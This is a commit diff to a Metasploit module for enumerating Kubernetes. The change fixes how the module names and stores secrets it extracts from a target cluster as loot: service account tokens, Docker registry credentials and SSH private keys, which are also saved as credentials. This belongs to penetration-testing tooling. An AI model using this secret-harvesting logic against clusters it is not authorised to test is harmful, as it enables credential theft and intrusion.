Correctly store extracted loot
This commit is contained in:
parent
adbe6070ab
commit
f28ced60ee
|
@ -131,7 +131,8 @@ module Msf::Exploit::Remote::HTTP::Kubernetes::Enumeration
|
|||
loot_name_prefix = [
|
||||
datastore['RHOST'],
|
||||
namespace,
|
||||
resource_name
|
||||
resource_name,
|
||||
secret[:type].gsub(/[a-zA-Z]/, '-').downcase
|
||||
].join('_')
|
||||
|
||||
case secret[:type]
|
||||
|
@ -170,19 +171,18 @@ module Msf::Exploit::Remote::HTTP::Kubernetes::Enumeration
|
|||
%i[namespace token].each do |key|
|
||||
data[key] = Rex::Text.decode_base64(data[key])
|
||||
end
|
||||
loot_name = loot_name_prefix + '-token'
|
||||
|
||||
loot_name = loot_name_prefix + '.json'
|
||||
path = store_loot('kubernetes.token', 'application/json', datastore['RHOST'], JSON.pretty_generate(data), loot_name)
|
||||
print_good("service token #{resource_name}: #{path}")
|
||||
when Msf::Exploit::Remote::HTTP::Kubernetes::Secret::DockerConfigurationJson
|
||||
json = Rex::Text.decode_base64(secret.dig(:data, :".dockerconfigjson"))
|
||||
loot_name = loot_name_prefix + '-json'
|
||||
loot_name = loot_name_prefix + '.json'
|
||||
|
||||
path = store_loot('docker.json', 'application/json', nil, json, loot_name)
|
||||
print_good("dockerconfig json #{resource_name}: #{path}")
|
||||
when Msf::Exploit::Remote::HTTP::Kubernetes::Secret::SSHAuth
|
||||
data = Rex::Text.decode_base64(secret.dig(:data, :"ssh-privatekey"))
|
||||
loot_name = loot_name_prefix + '-ssh_key'
|
||||
loot_name = loot_name_prefix + '.key'
|
||||
private_key = parse_private_key(data)
|
||||
|
||||
credential = credential_data.merge(
|
||||
|
@ -198,7 +198,7 @@ module Msf::Exploit::Remote::HTTP::Kubernetes::Enumeration
|
|||
vprint_error("Unable to store #{loot_name} as a valid ssh_key pair")
|
||||
end
|
||||
|
||||
path = store_loot('id_rsa', 'text/plain', nil, json, loot_name)
|
||||
path = store_loot('id_rsa', 'text/plain', nil, data, loot_name)
|
||||
print_good("ssh_key #{resource_name}: #{path}")
|
||||
end
|
||||
rescue StandardError => e
|
||||
|
|
Loading…
Reference in New Issue